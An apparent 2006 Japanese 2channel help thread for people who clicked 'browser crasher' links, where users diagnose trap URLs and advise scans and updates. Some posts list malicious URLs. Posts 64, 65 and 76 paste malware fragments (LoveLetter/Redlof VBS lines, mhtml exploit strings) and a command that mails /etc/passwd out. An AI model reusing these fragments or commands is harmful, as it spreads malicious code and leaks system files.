またブラクラ踏んでしまいました(+x+)
at SEC
1:名無しさん@お腹いっぱい。
06/11/07 16:30:59
「なんか変なのふんだ!!どうしよう!!!11」
「PC蛾物故割れたwwwww」
あやしいリンクを踏んでしまって、あわてている人のためのスレッドです
あわてていても>>2-10くらいは目を通しましょう
前スレ
ブラクラ踏んでしまいました(*_*)
スレリンク(sec板)
関連スレ
セキュリティ初心者質問スレッド
URLリンク(find.2ch.net)
2:名無しさん@お腹いっぱい。
06/11/07 16:31:40
★質問時のお約束★
ウィスルやブラクラだと思われる物の直リンは厳禁!!!!!!!!!!
質問の時は頭の『ht』を抜いて貼り付ける事
あなたが踏んだあやしいリンクのURLは回答に必要な情報ですが
同時に凶器にも成り得ます。他の方が誤って踏まないよう注意しましょう
3:名無しさん@お腹いっぱい。
06/11/07 16:32:36
★よく出るブラクラ★
www.hellplant.org/cgi-bin/xoor/serpent.cgi
メディアプレーヤーやtelnetを起動
Outlookに変なニュースグループを作成
最後にIPを抜かれる
とりあえずPCに実害は無いので踏んだら再起動でおk
4:名無しさん@お腹いっぱい。
06/11/07 16:33:49
★最近よくある手口その1★
〜画像リンクに見せかけて実はブラクラ〜
例:up2.viploader.net/pic/src/viploader90786.jpg
(既に404です)
URL末尾がjpgでも油断してはいけません
こんなのはどうとでも書けます
IEは初期設定ではリンク先をファイルの内容に従って開くので
対象がhtmlなどであれば、ブラクラが炸裂する事も
5:名無しさん@お腹いっぱい。
06/11/07 16:34:20
★最近よくある手口その2★
〜超巨大画像〜
例:www.lbycwi.org/images/Logos/LBYC%20Burgee-w-text-huge.jpg
(危険。踏まないで下さい)
画像は画像ですが、それが度を越すと凶器にもなります
例の画像は解像度12000×6927を誇り、あなたのPCのメモリを強烈に消耗します
低スペックPCでは固まる原因になります
また、こういった画像がアップローダーなどで再利用される場合もあります
6:名無しさん@お腹いっぱい。
06/11/07 16:34:52
★最近よくある手口その3★
〜ニュースサイト見せかけて実はブラクラ〜
例:newsheadline.tripod.com/sports/20060928-00000025-san-fi.html
例:headline-news.tripod.com/national/20061028-000000112-asa-soc.html
(前スレより、現在は404)
URLは結局どうとでも書けるという事です
ブラクラ程度で済めばいいですが、中にはウイルスサイトに繋がっているなど
本当に悪質な物もあります。日頃からPCセキュリティに留意しましょう
最悪↓だけはやっておきましょう
WindowsUpdate
URLリンク(update.microsoft.com)
7:名無しさん@お腹いっぱい。
06/11/07 16:37:57
あなたが悪質なリンクを踏んでしまった時に
あなたのPC環境の情報が必要になる場合があります
その場合は以下の項目を記入してください
【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】
8:名無しさん@お腹いっぱい。
06/11/07 16:39:55
とりあえずこんな感じか
あやしい記述や不足分があれば指摘ヨロ
後は需要に任せる
9:名無しさん@お腹いっぱい。
06/11/07 19:51:18
乙カレさん ^^
10:名無しさん@お腹いっぱい。
06/11/08 10:58:06
スレ立て乙です
毎日、このスレを覗いてはブラクラURLをNG登録するのが日課です
11:名無しさん@お腹いっぱい。
06/11/09 13:54:08
乙
12:名無しさん@関西自慰協会会長
06/11/09 14:40:36
モツ
13:名無しさん@お腹いっぱい。
06/11/09 17:27:56
スレリンク(sec板)l50
精神的にかなり苦痛なのですが、対処法おねがいしまつ
14:名無しさん@お腹いっぱい。
06/11/09 17:59:05
どれが苦痛なのかな?
15:名無しさん@お腹いっぱい。
06/11/09 19:34:16
>>14
NODは確かにいいソフトで購入検討していましたが、あちらこちらに沸いたNOD厨のおかげで、
今ではNODと32という文字を見るだけで、寒気、めまい、吐き気を感じるようになってしまいました。
上記の文字を含んだスレタイはブラクラに値すると思います。
16:名無しさん@お腹いっぱい。
06/11/09 19:47:15
>>15 こちらで答えが見つかるのではないかと・・・
URLリンク(life7.2ch.net)
URLリンク(life7.2ch.net)
URLリンク(life7.2ch.net)
17:とにかくソフトを試しまくる人
06/11/09 20:14:15
>>15
そうですか、それはお気の毒に・・・
しかしながら大多数は、なんたちゃってNOD使いによる
NOD厨を装って嫌悪感を演出する低脳テクニック
を駆使するやからばかりなので、どうか考慮してあげて下さい。
あなたのご気分が、少しでも早く回復することを願っています。
18:名無しさん@お腹いっぱい。
06/11/09 20:23:21
物事は分けて考えようぜ。
NOD32という製品とその使用者は明確に分離されるべきである、と。
19:名無しさん@お腹いっぱい。
06/11/09 20:29:28
精神的ブラクラ対策のためにFirefoxのコンテンツ-画像設定で
例外設定にサイトをひとつずつ載せているのですが
urlをまとめてあるサイトとかないでしょうか?
20:名無しさん@お腹いっぱい。
06/11/10 19:41:40
URLリンク(headline-news.tripod.com)
おねがいしまつ
21:名無しさん@お腹いっぱい。
06/11/10 19:46:36
>>20 URLリンク(so.7walker.net)
22:名無しさん@お腹いっぱい。
06/11/10 20:00:12
>>20
>>6
有害無害含めて30種類の悪意あるサイトを呼び出すブラクラ
WindowsUpdate済みなら多分踏んで即感染は無い
一時ファイル削除して適当なウイルススキャンして何も出なければおk
23:名無しさん@お腹いっぱい。
06/11/10 20:11:38
>>21-22
ありがとうございます。アップデートはしてません。
PCがぶっ壊れました。携帯からのカキコです(泣
24:名無しさん@お腹いっぱい。
06/11/10 20:20:59
>>20
Java/ClassLoader.AA トロイ
JS/WindowBomb.G トロイ
Win32/TrojanDownloader.Small.NBQ トロイ
VBS/Redlof.M ウイルス
Win32/Exploit.WMF トロイ の亜種
Win32/AdInstaller
Win32/AdInstaller アプリケーションの亜種
など多数ありあり
25:好奇心怖い
06/11/10 20:47:16
URLリンク(www.c-games.net)
を踏んでしまいました。
キーロガーだ、パス抜かれた、垢ハックされたetc・・・と言われてて不安でたまりません。
不用意に踏んだ自分に非があるのは十分承知してます。
釣りだといいのですが、もし本当だとしたらどう対処すればよいのでしょうか?
26:名無しさん@お腹いっぱい。
06/11/10 20:58:36
>>25
踏んだだけではなんにも反応せん。
ただのはったりだな、それ。
27:名無しさん@お腹いっぱい。
06/11/10 21:02:05
>>25
>>26と同意見。とりあえずそのURLまでなら不審な点は見当たらない
28:名無しさん@お腹いっぱい。
06/11/10 21:08:42
>>25
そのURL、さらにその先も色々踏んだがなにも無し。
なんなら自分で再度踏んでみればわかる。 ^^
29:名無しさん@お腹いっぱい。
06/11/10 21:11:29
>>25は何でこのスレに持ち込んだのだろう
30:好奇心怖い
06/11/10 21:14:09
>>26>>27>>28
感謝します。
31:名無しさん@お腹いっぱい。
06/11/10 21:31:48
>>29
そりゃ怖がりだからさ、おk?
32:名無しさん@お腹いっぱい。
06/11/10 21:32:19
>>30
^^
33:名無しさん@お腹いっぱい。
06/11/12 14:10:47
あ
34:名無しさん@お腹いっぱい。
06/11/12 16:39:15
トミヤアパレル株式会社
URLリンク(www.tomiya-ap.com)
IMON ファイル URLリンク(www.tomiya-ap.com) Win32/Nachi.B ワーム 切断されました
35:名無しさん@お腹いっぱい。
06/11/16 19:35:15
URLリンク(headline-news.tripod.com)
踏んでしまいました・・・
初心者の自分にはいい勉強になった・・・
36:エロ好きな質問者
06/11/16 19:57:36
踏んでしまいました。
どこへ行けば解決できますか。
IE6
スレイプ
URLリンク(strange.kir.jp)
開き続けています。
37:名無しさん@お腹いっぱい。
06/11/16 19:58:43
>>35
何事も経験経験。ところでリンクを貼るときはhを抜いてね。特にやばめのリンクは。
38:名無しさん@お腹いっぱい。
06/11/16 20:13:11
踏んでしまってEXPL_WMF GENというのにかかってしまったんですが
どんなウイルスなんですか?
39:名無しさん@お腹いっぱい。
06/11/16 20:15:40
URLリンク(headline-news.tripod.com)
踏んじゃった。
以前からあるURLらしいけど、どーだろ。
とりあえずspybotとAd-AwareSEでスキャン&削除したけど
まだなんかした方がいいかな
40:名無しさん@お腹いっぱい。
06/11/16 20:36:22
>>39
>とりあえずspybotとAd-AwareSEでスキャン&削除したけど
新種のウィルスやトロイが入ってたらやっかいなので
カスペルスキーのオンラインスキャンぐらいおれはやるけどな
41:名無しさん@お腹いっぱい。
06/11/16 20:38:17
>>38
ぐぐるくせをつけるべし
URLリンク(www.trendmicro.co.jp)
42:38
06/11/16 20:55:00
>>41
ありがとうございました
43:エロ好きな質問者
06/11/16 22:39:58
ブラクラじゃないかも知れません。
ポップアップブロック有効にしてた気がします。
「既定のメールクライアントが正しくインストールされていないため
この操作を行えませんでした。」のウィンドウが開きます。
消しても、消しても、同じウィンドウが開きます。
このタブだけ消せれたらよいのですが。
ヤバイと思ってF4押したけど、時すでに遅しでした。
今、スレイプは操作を受け付けない状態です。
44:名無しさん@お腹いっぱい。
06/11/16 23:16:22
>>39
自分もこれ踏んじゃったのですけど
踏む
↓
一時ファイル消去
↓
インストしてるAVGでウィルススキャンするも反応なし
↓
カスペルスキーでオンラインウィルススキャン
-----
スキャンの統計
スキャンしたオブジェクトの総数 71143
検知されたウイルス 1
感染したオブジェクト 0
疑わしいオブジェクト 6
感染オブジェクト名 ウイルス名 前回の処理
C:\Documents and Settings\***\My Documents\Jane Style\Logs\*** 疑わしい: Exploit.HTML.Mht
上記のような2chのログが6つ検出
-----
↓
シマンテックのオンラインウィルススキャンでも
2chログの誤検出のみ
って状況でした
最後にシステムの復元をして通常利用に戻ろうと思うのですが
大丈夫でしょうか?今のところ特に以前と変わった点はありません
一応こまめにアップデートしてるのが功を奏したのかな・・・と思ってるんですが
45:名無しさん@お腹いっぱい。
06/11/16 23:26:08
>>44
問題なす
46:名無しさん@お腹いっぱい。
06/11/17 00:00:15
>>43
>36はDr.Web R ? onlineでExploit.WinCrashとでたよ
タスクマネージャからプニル終了させたら
47:名無しさん@お腹いっぱい。
06/11/17 00:11:55
>>45
ありがとうございます
48:名無しさん@お腹いっぱい。
06/11/17 00:18:02
>>47
^^
49:名無しさん@お腹いっぱい。
06/11/17 00:57:25
OK。ブラクラくらったぜ 。
∧_∧
∧_∧ (´<_` ) 流石だよな俺ら。
( ´_ゝ`) / ⌒i
/ \ | |
/ / ̄ ̄ ̄ ̄/ |
__(__ニつ/ FMV / .| .|____
\/ / (u ⊃
 ̄ ̄ ̄ ̄ ̄
ガタガタガタタタタタ・・・・
50:エロ好きな質問者
06/11/17 03:31:21
>>46
ありがとうございました。
プラウザはあきらめるしかないのでしょうか。
51:名無しさん@お腹いっぱい。
06/11/17 03:45:32
>>50
>プラウザはあきらめるしかないのでしょうか。
意味がよくわかんない。
52:39
06/11/17 08:33:44
補足。一応バスター2007入ってます。
でも心配でspybotとAd-AwareSEでスキャン、更にセーフモードでもう一回Ad-AwareSE。
オススメのカペルスキーオンラインスキャンをやったら以下の結果
C:\Program Files\Live2ch\log\life7.2ch. (中略).dat 疑わしい:
C:\Program Files\Live2ch\log\music5.2ch. .dat 疑わしい:
C:\Program Files\Live2ch\log\news19.2ch. 5.dat 疑わしい:
C:\Program Files\Live2ch\log\news19.2ch.net dat 疑わしい:
C:\Program Files\Trend Micro\Virus Buster 2007\Quarantine\75D.tmp 疑わしい:
C:\Program Files\Trend Micro\Virus Buster 2007\Quarantine\Backup\meroharudoumei[1].RB0 感染: Virus.VBS.Redlof.a
バスターが感染ってどういうコト?
誤検出でイイのかな?
改めてバスターでスキャンしたらAd−Awareが誤検出されたし。
53:名無しさん@お腹いっぱい。
06/11/17 09:10:31
C:\Program Files\Live2ch\log\life7.2ch. (中略).dat 疑わしい:
C:\Program Files\Live2ch\log\music5.2ch. .dat 疑わしい:
C:\Program Files\Live2ch\log\news19.2ch. 5.dat 疑わしい:
C:\Program Files\Live2ch\log\news19.2ch.net dat 疑わしい:
たぶん2chに書き込まれたコードだろうけど、疑わしいと判定されてるなら
削除すればいいでしょ。 所詮2chのログだし。
バスターはわからん。
54:名無しさん@お腹いっぱい。
06/11/17 10:04:16
>>52
Quarantine = 隔離
バスターが隔離したウイルスにカスペが反応しているだけ
既にバスターが無害化したファイルだからそのままで問題無い
それでも気持ち悪いと思うなら隔離逝きになったファイルを削除してしまえばいい
55:39
06/11/17 10:30:52
>53 >54
ありがとうございました。
2chのログは削除済みです。
バスターはそのままで良いのですね、安心しました。
56:名無しさん@お腹いっぱい。
06/11/18 17:14:29
URLリンク(www5d.biglobe.ne.jp)
ここなんですが、踏んだらWinメディアプレイヤーが不正終了しました
何か問題があるURLか分かる方いませんか?
57:名無しさん@お腹いっぱい。
06/11/18 17:47:31
URLリンク(www.mayhem.net)
これ踏んじゃいました。ブラクラらしいのですが、なにも起こりません。
急に再発したりするんですかね?
58:名無しさん@お腹いっぱい。
06/11/18 17:56:33
>>56
「video/mpeg」を発見しました。(4.3 MB) SCOでは問題ないようです。
右クリックしてダウンロード再生してみては?
59:名無しさん@お腹いっぱい。
06/11/18 18:02:48
>>56
普通にみれたぜ。
浜崎のコンサートの一部だった。
60:名無しさん@お腹いっぱい。
06/11/18 18:04:34
>>57
ブラクラではありません。
ただ動画自体が揺れるのでくらくらします。
61:名無しさん@お腹いっぱい。
06/11/18 18:08:18
>>58-59
そうでしたか!ありがとうございます。
いま心配でMcafee走らせましたが、感染なしでした。
62:名無しさん@お腹いっぱい。
06/11/18 18:17:24
>>58
右クリックでダウンロードして観たら、ちゃんとみれました。
お騒がせいたしました。
63:59
06/11/18 18:20:16
>>61
Mcafeeで発見できないトロイなどがあるので
やばいと思ったらカスペルスキーのオンラインスキャンあたりで確認する方がいいよ。^^
by 元Mcafee使ってた人
p.s.
上のURLは問題ないので安心してほしい。^^
64:名無しさん@お腹いっぱい。
06/11/18 18:21:08
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
c.Copy(dirwin&"\Win32DLL.vbs <body onload=window()> c.Copy(dirsystem&"\MSKernel32.vbs
ms-its:mhtml:file://C:\
65:名無しさん@お腹いっぱい。
06/11/18 18:21:43
O16 - DPF: {11111111-1111-1111-1111-111111111157} - ms-its:mhtml:file://c:\nosuch.mht!
66:56
06/11/18 18:25:27
>>63
ご丁寧にありがとうございます。
重ねてお礼いたします。
67:名無しさん@お腹いっぱい。
06/11/18 18:26:39
>>66
^^
68:名無しさん@お腹いっぱい。
06/11/20 16:09:25
URLリンク(jp.drivecleaner.com)
日本向けに作られたサイトみたいです。
一種のブラクラと思いますが、鑑定お願いします。
69:名無しさん@お腹いっぱい。
06/11/20 16:15:04
>>68
インチキソフトサイト
騙されてダウンロード・実行しなければ特段害は無い
関連スレ
WinAntiVirus-詐欺ソフト対策総合スレ-SystemDoctor
スレリンク(sec板)
70:68です
06/11/20 17:58:39
>>69
ありがとうございます。
YouTubeの動画観てたら、いきなり「Drivecleaner」に飛ばされました。
表記の日本語がおかしく、閉じてもまた出てくるのでタスクで強制終了いたしました。
勉強不足でした<(_ _)>
失礼ですが、こちらのスレッド開くたびにノートン先生反応するのですが、自分だけ!?
なにやら 「HTTP MSIE JavaScript OnLoad Rte CodeExec」 の試みを検出して遮断しました とか、
Bloodhound.Exploit.6 (ウィルス)を検出、修復しましたって???
71:名無しさん@お腹いっぱい。
06/11/20 18:14:56
>>70
ノートンがウィルスコードに反応してるだけだよ。
それがノートンの弱点なのだよ、これが。
いい加減改良しろよスマンテック社。
72:名無しさん@お腹いっぱい。
06/11/21 03:35:37
URLリンク(headline-news.tripod.com)
踏んでしまいました。
Macでも何か問題が起こることはありますか?
73:名無しさん@お腹いっぱい。
06/11/21 04:26:22
>>72
tripod.com自体は単なるウェブホストサイトなのでそこまでなら無害
>>6のようにそれ以降の文字列が問題になる
ただ、今、tripod.comを踏むと>>69にある詐欺ソフトを薦められる場合がある
これを騙されて実行すると有害。macで動くかどうか分からんが
特に何も出なかったよ、というならそれも問題無し
74:名無しさん@お腹いっぱい。
06/11/21 05:35:51
>>72
macなら平気でしょたぶん。
心配ならばmac用のフリーソフトでチェックすればおkだと思うよ。
75:72
06/11/23 03:35:13
ありがとうございました。
安心しました。
76:名無しさん@お腹いっぱい。
06/11/23 03:39:20
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"),
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
c.Copy(dirwin&"\Win32DLL.vbs")
ms-its:mhtml:file://c:\
End Sub
これなんですか?
77:名無しさん@お腹いっぱい。
06/11/23 05:08:49
これが噂のノートントラップを引き起こすウィルスコードです・・・
釣られますた;
78:名無しさん@お腹いっぱい。
06/11/26 10:41:19
URLリンク(www.lbycwi.org)
79:名無しさん@お腹いっぱい。
06/11/26 13:47:52
URLリンク(www1.harenet.ne.jp)
これURLからしてブラクラだと思うんですが、どうなんでしょうか?
80:名無しさん@お腹いっぱい。
06/11/26 14:20:51
>>79
ブラ・・・・すれ違いです。本当にありがとうございry
81:125x101x126x234.ap125.ftth.ucom.ne.jp
06/12/01 10:16:05
あげ
82:名無しさん@お腹いっぱい。
06/12/04 00:46:02
URLリンク(www.geocities.com)
踏んだらウインドウがたくさん出てきてしまいました><
83:名無しさん@お腹いっぱい。
06/12/04 11:25:03
>>82
そこトロイも仕込まれるお
84:名無しさん@お腹いっぱい。
06/12/04 11:28:17
>>82
テルネットストームだね
85:名無しさん@お腹いっぱい。
06/12/05 03:08:09
かつてのソースチェッカーオンラインってサイト
URLリンク(7walker.com)
へアクセスしようとすると、ムハンマドとかHackedとか書かれた怪しいサイト
URLリンク(www.wolfsecurity.org)
へ飛ばされるようになったんですがここはヤヴァイサイトでしょうか・・
86:名無しさん@お腹いっぱい。
06/12/05 06:12:10
>>85
よくわからんがハッカー連中のホームページかな
とりあえず踏んで即何かを仕掛けられるというのは無いみたいだが
手口も思想的にもヤヴァイ連中かも知れん
奥に進むとブルートフォースとか置いてあるし
まぁ関わり合いにならん方がいいだろう
87:名無しさん@お腹いっぱい。
06/12/05 12:21:57
URLリンク(so.7walker.net)
こっちは?
88:名無しさん@お腹いっぱい。
06/12/05 12:40:36
>>87
ソースチェックサービスは利用可能だけど
普段ページ中心に据えられている更新履歴がごっそり無くなっている
やっぱ何かあったのかね
89:名無しさん@お腹いっぱい。
06/12/05 12:47:31
やられたっぽい
//www.7walker.com/のTOP
↓
hacked by cobra_21
90:名無しさん@お腹いっぱい。
06/12/05 13:12:17
トップページが書き換えられてしまっている
URLリンク(so.7walker.net)
91:名無しさん@お腹いっぱい。
06/12/05 13:23:39
どういうことなの?
92:名無しさん@お腹いっぱい。
06/12/05 13:27:20
Site Hacked by lord Chy
白・・・
93:名無しさん@お腹いっぱい。
06/12/05 15:09:48
>>90
そいつ、画像はやつらのサイトから取ってきてるから踏むとアクセスログ取られるかもよ。
94:名無しさん@お腹いっぱい。
06/12/05 17:07:56
他スレからモテキタ(^o^)
186 名前:猫△ワル男 ◆oKLssLV2YM [sage] 投稿日:2006/12/05(火) 16:45:04 ID:???
トップを食われちゃってますね 無差別攻撃かな
まあお忙しいとかおっしゃってましたので(公開コメントで)こんなこともあるんでしょう
全破壊を受けたわけではないようです 復旧まで、迂回路(?)を使いましょう
ただし、どんな地雷を埋められているかわからないので、
サイトの再インストール完了宣言までは、安全判定不可扱いです
URLリンク(so.7walker.net)
URLリンク(so.7walker.net)
95:名無しさん@お腹いっぱい。
06/12/05 19:47:10
クラッキング(ハッキング)されました。。。
どうやら
7walker.com
7walker.net
どちらのサイト共にやられたようです。
階層内もずたずたにされており、
危険なファイルがまぎれている場合があるので、
サイト内にアクセスする場合は気をつけてください。
あとソースチェッカーオンラインですが、
誠に勝手ながら休憩させていただきます。
なお復帰時期は未定です。
あらら。。。
96:名無しさん@お腹いっぱい。
06/12/05 19:49:27
さっき普通にチェックしたあともう一度チェックしたらその表示が出てきてワロタ
97:85
06/12/05 21:11:39
みなさんレスありがとうございました。 こーゆー事だったんですね。
Janeとかのコマンドに指定していつも確認してから観てたんですけど
自分ひとり変なページに飛ばされてたんで実況とかついていけなかっ
た...orz
98:名無しさん@お腹いっぱい。
06/12/05 23:25:52
ブラクラで検索かけてこのスレ来ました。
ソースチェッカーオンラインをいつも利用していたのですが
なんか攻撃されたとかで>>94-95ですね
復帰時期が未定とのことなので代わりになるサイトを探しています
どこかおすすめのところはありますか?
専ブラから飛んでいけるサイトを探しています
(専ブラを利用しているので専ブラで知りたいサイトのURLをクリックして飛んでいく)
99:名無しさん@お腹いっぱい。
06/12/06 00:52:55
>>98
URLリンク(www.kakiko.com)
これはどうかな?
100:名無しさん@お腹いっぱい。
06/12/06 00:53:46
とりあえずview-source:かね。 SP2は同等品とかで
101:名無しさん@お腹いっぱい。
06/12/06 06:43:11
>>98
URLリンク(rd.or.tp)
102:名無しさん@お腹いっぱい。
06/12/07 23:38:19
"Hacked by" "Site hacked"でググルと哀れなサイトが結構出てきてウケル。
103:名無しさん@お腹いっぱい。
06/12/07 23:39:09
おっと、ヒットしても踏むときは自己責任でなw
104:名無しさん@お腹いっぱい。
06/12/08 15:54:01
ki143.opt2.point.ne.jp
222.225.95.143
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 222.225.0.0/16
b. [ネットワーク名] TEPCO-HIKARI
f. [組織名] 株式会社ドリーム・トレイン・インターネット
g. [Organization] DREAM TRAIN INTERNET,Inc.
m. [管理者連絡窓口] MH4804JP
n. [技術連絡担当者] MH4804JP
p. [ネームサーバ] ns.dti.ad.jp
p. [ネームサーバ] ns2.dti.ad.jp
[割当年月日] 2005/07/22
[最終更新] 2006/08/31 11:44:09(JST)
上位情報
----------
KDDI 株式会社 (KDDI Corporation)
[割り振り] 222.225.0.0/16
105:名無しさん@お腹いっぱい。
06/12/09 23:38:21
kengo.physical0816@ezweb.ne.jp
106:名無しさん@お腹いっぱい。
06/12/14 09:22:09
先日他所で>>3のブラクラを踏んでしまいました。
接続はすぐに切ったんですが、自分なりに調べてみたらADSL以外の環境では
国際電話やQ2に繋がってしまうと書いてありました。
自分はカード型PHSで接続しているので、料金がかかる可能性が高いんでしょうか?
>>3には実害は無いと書いてありますが、どうなんでしょう?
自分の責任なのはわかっていますが、良かったら教えてください。
107:名無しさん@お腹いっぱい。
06/12/14 19:50:17
ダイアルのプロパティをみて番号が正規のプロバイダになっているか確認せよ
108:名無しさん@お腹いっぱい。
06/12/15 05:57:32
>>107
レスありがとうございます
カード型PHSのダイヤル先を確認してみたんですが、元のプロバイダの電話番号でした。
この場合、今現在は大丈夫と考えてよいのでしょうか?
また、ブラクラを踏んだ時点で課金されている可能性はありますよね?
109:名無しさん@お腹いっぱい。
06/12/15 10:41:34
PHS以外の接続設定が出来てたら繋がった可能性はある。
>カード型PHSで接続しているので
willcomなら注意事項を読んでこれ申し込んどけ
URLリンク(www.willcom-inc.com)
>また、ブラクラを踏んだ時点で課金されている可能性はありますよね?
質問の意味がわからない
110:名無しさん@お腹いっぱい。
06/12/15 23:51:05
>>82
これを踏んでVB2007が反応し窓がたくさんでてきてやばいと思ったので
再起動
LANケーブルをはずしウィルスチェックかけるとウィルスが検出され
隔離されたとの報告
気持ち悪いのでバックアップソフト(HDD革命)でシステムドライブを
一週間前の状態に戻した
他のドライブに影響出てないといいが
というか初めてウィルス踏んだ・・orz
111:名無しさん@お腹いっぱい。
06/12/16 00:08:49
>>110
今はバスター使ってないからわからんが
検出されたのはこれじゃないのか
URLリンク(www.trendmicro.co.jp)
ブラクラを起こすスクリプトを便宜上ウイルス扱いしているだけで
システム破壊や感染活動は行わない
踏んだ時に一回発動してそれっきりのはず
>ウィルスチェックかけるとウィルスが検出され
一時ファイルに該当のjsが残っていたのだと思うけど
対処法としては放置か、気になるなら一時ファイル削除して再起動すれば十分
わざわざ復元措置をするほどの、大層な代物では無い
別にまぁ、気持ち悪いから戻す、というのも精神衛生の面で十分な理由ではあると思うけどね
112:名無しさん@お腹いっぱい。
06/12/16 00:13:37
>>111
そのウィルスです
あまり危険じゃないのですね安心しました
113:名無しさん@お腹いっぱい。
06/12/16 02:49:43
URLリンク(headline-news.tripod.com)
これ踏んでやられました。
対処法を教えてください。
IEが開きません
114:名無しさん@お腹いっぱい。
06/12/16 03:15:08
>>6-7
115:名無しさん@お腹いっぱい。
06/12/16 03:25:53
【使用OS】
windows xp
【WindowsUpdateしてるか】
最近していない
【AntiVirusは何を使っているか】
ノートン
【ちゃんとUpdateしてるか】
していない
【スキャンした結果(ウイルス名・発見場所)
2ちゃん内
【別のオンラインスキャンしたならその結果は】
ウイルスを発見、削除できません。
【症状を具体的に、分かる限りすべて書く】
IEが開かない。エラーとでる
【何をしたらそんなことになったのか】
2チャン内のURLふみました
【これまでにとった措置】
テンポラリー内削除
【その他の質問】
PC買い替えになるのでしょうか?
116:名無しさん@お腹いっぱい。
06/12/16 14:04:08
>>109
ありがとうございます。
それは便利ですね。すぐにでも登録します。
下部の文は、あのブラクラを踏んでから接続を切るまでの間に
Q2に繋がれていた可能性はあるかって事です。
日本語ヘタですみません。
117:名無しさん@お腹いっぱい。
06/12/16 18:35:37
>>115
ウイルス名は?
118:名無しさん@お腹いっぱい。
06/12/17 02:39:54
>>116
109ではないが。Q2やらに接続されていた可能性はないとはいえないが、低い。
気になるのなら電話会社で通話明細を確認してみた方がいいと思う。
Q2はNTTのサービスなのでNTT以外の会社からつながったのかな?試しにどこかのQ2にかけてみれば?
119:名無しさん@お腹いっぱい。
06/12/17 02:44:52
>>115
PCのダメージ少ないなら、ウイルス駆除→IE再インスコで治るかも。だめだったらOSを再インスコまたはシステムリカバリーディスクを使用。
買い換える必要はないだろ。
120:名無しさん@お腹いっぱい。
06/12/17 13:27:42
URLリンク(www.hellplant.org)
これ踏んじゃったんだけど、これ貼った奴訴えても良い?
121:名無しさん@お腹いっぱい。
06/12/17 13:30:46
>>120
くだらねえ。
やめとけ。
mmsとか使ってプロクシを回避、IPアドレスを抜くやつだ。
ブラクラでも何でもねえ。
122:名無しさん@お腹いっぱい。
06/12/17 13:38:07
>>121
URLリンク(www.hellplant.org)
のアドレスをクリックすることで、ブラウザクラッシャーという悪質ないたずらが発生する。
無制限にさまざまなプログラムが起動し、CPUやメモリの許容範囲を超えるような作動をし、
フリーズし、強大な負荷により、ハードディスクが破損する恐れもあるという。
そして、最後には、ダイアルアップ回線などの回線をtelnetという回線に移行させ、国際回線などの
高額な料金を請求されてしまう。
プロバイダに確認したところ、CATVやADSLや光ファイバーではtelnetによって回線を勝手に変えられることはないようだが、不確定なので注意すべきだ。
この掲示板でも、なんどもこのアドレスを偽装して踏ませようとする悪質な罠を作成する陰湿な者がいるので注意してほしい。
って書いてあるんだけど、じゃあ害は無いの?
123:名無しさん@お腹いっぱい。
06/12/17 13:43:00
本質はブラクラじゃねえよ。
ブラクラっぽい動作をするだけだ。
本質はIPアドレスの表示。
124:名無しさん@お腹いっぱい。
06/12/17 13:54:32
>>123
じゃあ対策は要らないんですか?
125:名無しさん@お腹いっぱい。
06/12/17 14:29:30
俺も別の板のスレで>>120踏んでしまった。
ノートンがブロックしてくれたような気がするけど、ヤバいかな。
とりあえずスパイウェアチェックとウイルスチェックしてこよう
126:名無しさん@お腹いっぱい。
06/12/17 14:36:47
>>122
>最後には、ダイアルアップ回線などの回線をtelnetという回線に移行させ、国際回線などの
高額な料金を請求されてしまう。
Telnetクライアントでググってみろ
ダイヤルアップなんかと全然関係ねえよw
127:名無しさん@お腹いっぱい。
06/12/17 14:42:57
一例としてWindows98からUNIXのサーバーを利用する場合を示すと、上記で起動したTelnetクライアントの「接続」メニューの
「リモートシステム」を選択し、「ホスト名」に相手のサーバーのIPアドレスかホスト名を入力するとサーバーに接続され、
「login」名と「Password」の入力が求められるので、正しく入力すると使用できるようになる。
128:名無しさん@お腹いっぱい。
06/12/17 14:50:17
俺なんてその手のブラクラ10000回は踏んでるなw
tskill iexploreでいつも強制終了させてるわさww
129:名無しさん@お腹いっぱい。
06/12/17 14:51:33
訴えるも何も自分が危険URLをここに貼ってるじゃん
130:名無しさん@お腹いっぱい。
06/12/17 14:52:14
url
IPが抜けませんでしたっ
www.hellplant.org/cgi-bin/xoor/serpent.cgi - 2006年12月16日 - このサイト内で検索
131:名無しさん@お腹いっぱい。
06/12/17 15:00:01
そもそもが一般人にTelnet.exeなんて必要ねえじゃねえかよ
ファイアーウォールで外向けをブロックしちまえよw
それと、それらの相手先のTelnetサーバーは応答なんてして来ねえよ
132:名無しさん@お腹いっぱい。
06/12/17 15:16:13
>>119
ウイルス駆除ってww
その方法を記載しろよ・・・
133:名無しさん@お腹いっぱい。
06/12/17 15:30:20
感染したって言ってるウィルス名も分からないのにどうアドバイスしろと・・・
134:名無しさん@お腹いっぱい。
06/12/17 15:31:03
>>133
つクリーンインスコ
135:名無しさん@お腹いっぱい。
06/12/17 16:39:41
>>118
さすがに自爆はできないですw
でも不安だったら確認してみるよ。ありがとう。
136:125
06/12/17 20:32:49
とりあえずspybotのスパイウェア検索とノートンの完全スキャンをしたけど検出0だった。
あとはTelnetの遮断をした。
無知な俺に出来る事はこれくらいか・・・
137:名無しさん@お腹いっぱい。
06/12/17 21:26:48
>>136
>ノートンの完全
他社のオンラインスキャンを併用しておいたほうが吉
URLリンク(www.kaspersky.co.jp)
by ノートン2007使い
138:136
